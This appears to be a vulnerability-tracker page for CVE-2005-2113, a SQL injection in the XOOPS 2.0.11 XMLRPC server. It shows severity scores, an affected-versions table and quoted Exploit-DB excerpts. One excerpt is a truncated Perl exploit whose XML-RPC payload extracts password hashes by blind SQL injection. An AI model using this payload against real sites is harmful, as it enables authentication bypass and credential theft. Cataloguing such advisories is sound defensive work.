CVE-2005-2113
published 2005-07-05CVE-2005-2113: SQL injection vulnerability in the loginUser function in the XMLRPC server in XOOPS 2.0.11 and earlier allows remote attackers to execute arbitrary SQL…
PriorityP342high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
1.25%
65.6th percentile
SQL injection vulnerability in the loginUser function in the XMLRPC server in XOOPS 2.0.11 and earlier allows remote attackers to execute arbitrary SQL commands and bypass authentication via crafted values in an XML file, as demonstrated using the blogger.getPost method.
Affected
15 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| xoops | xoops | — | — |
| xoops | xoops | — | — |
| xoops | xoops | — | — |
| xoops | xoops | — | — |
| xoops | xoops | — | — |
| xoops | xoops | — | — |
| xoops | xoops | — | — |
| xoops | xoops | — | — |
| xoops | xoops | — | — |
| xoops | xoops | — | — |
| xoops | xoops | — | — |
| xoops | xoops | — | — |
| xoops | xoops | — | — |
| xoops | xoops | — | — |
| xoops | xoops | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
XOOPS < 2.0.11 - Multiple Vulnerabilities
exploitdb·2015-06-29·CVSS 4.3
CVE-2005-2112 [MEDIUM] XOOPS < 2.0.11 - Multiple Vulnerabilities
XOOPS _checkUser($this->params[1], $this->params[2])) {
$this->response->add(new XoopsXmlRpcFault(104));
} else {
$struct = new XoopsXmlRpcStruct();
$struct->add('nickname', new XoopsXmlRpcString($this->user->getVar('uname')));
$struct->add('userid', new XoopsXmlRpcString($this->user->getVar('uid')));
$struct->add('url', new XoopsXmlRpcString($this->user->getVar('url')));
$struct->add('email', new XoopsXmlRpcString($this->user->getVar('email')));
$struct->add('lastname', new XoopsXmlRpcString(''));
$struct->add('firstname', new XoopsXmlRpcString($this->user->getVar('name')));
$this->response->add($struct);
}
}
the _checkUser function is really just a wrapper for the XMLRPC server, as the arguments are eventually passed to the XOOPS core function "loginUser()" which is where the real prob
Exploit-DB
XOOPS 2.0.11 - 'xmlrpc.php' SQL Injection
exploitdb·2005-07-04
CVE-2005-2113 XOOPS 2.0.11 - 'xmlrpc.php' SQL Injection
XOOPS 2.0.11 - 'xmlrpc.php' SQL Injection
---
#!/usr/bin/perl
## Xoops 0){
print qq{\b\b DONE ]
USER NAME : $name
USER HASH : $allchar
};
}
else
{
print "\b\b FAILED ]";
}
exit();
}
else
{
$allchar .= chr($char);
}
$s_num++;
}
sub found($$)
{
my $fmin = $_[0];
my $fmax = $_[1];
if (($fmax-$fmin)';
$data .= '';
$data .= 'blogger.getUsersBlogs';
$data .= '';
$data .= '';
$data .= '';
$data .= '';
$data .= '';
$data .= ''.$name.'\' AND ascii(substring(pass,'.$s_num.',1))'.$ccheck.')/*';
$data .= '';
$data .= '';
$data .= '';
$req = new HTTP::Request 'POST' => $url;
$req->content_type('application/xml');
$req->content($data);
$ua = new LWP::UserAgent;
$res = $ua->request($req);
$reply= $res->content;
if($reply =~ /Selected blog application does not exist/) { print "\n [-] NEWS BLOG DOES N
No writeups or analysis indexed.
http://marc.info/?l=bugtraq&m=112006318512991&w=2http://secunia.com/advisories/15843http://www.gulftech.org/?node=research&article_id=00086-06292005http://www.xoops.org/modules/news/article.php?storyid=2383http://marc.info/?l=bugtraq&m=112006318512991&w=2http://secunia.com/advisories/15843http://www.gulftech.org/?node=research&article_id=00086-06292005http://www.xoops.org/modules/news/article.php?storyid=2383
2005-07-05
Published